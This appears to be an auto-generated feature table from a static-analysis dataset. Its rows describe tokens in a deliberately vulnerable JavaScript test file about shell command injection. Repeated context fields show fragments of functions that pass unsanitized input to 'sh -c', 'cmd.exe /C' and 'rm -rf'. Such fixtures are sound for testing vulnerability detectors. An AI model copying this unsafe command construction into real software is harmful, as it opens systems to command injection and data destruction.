autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | 'arguments' object of anonymous function | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | exceptional return of anonymous function | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | exceptional return of anonymous function | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | functio ... }\\n\\t);\\n} | assignedToPropName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | functio ... }\\n\\t);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | functio ... }\\n\\t);\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | functio ... }\\n\\t);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | return of anonymous function | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | return of anonymous function | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:28:168:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:155:38:155:41 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:8 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:8 | cmd | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:8 | cmd | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:8 | cmd | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:8 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd = name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd = name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd = name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd = name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:6:156:15 | cmd = name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:12:156:15 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:12:156:15 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:12:156:15 | name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:12:156:15 | name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:156:12:156:15 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:7 | sh | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:7 | sh | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:7 | sh | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:7 | sh | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:7 | sh | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh = "sh" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh = "sh" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh = "sh" | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh = "sh" | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:6:157:14 | sh = "sh" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:11:157:14 | "sh" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:11:157:14 | "sh" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:11:157:14 | "sh" | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:11:157:14 | "sh" | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:157:11:157:14 | "sh" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:9 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:9 | args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:9 | args | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:9 | args | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:9 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 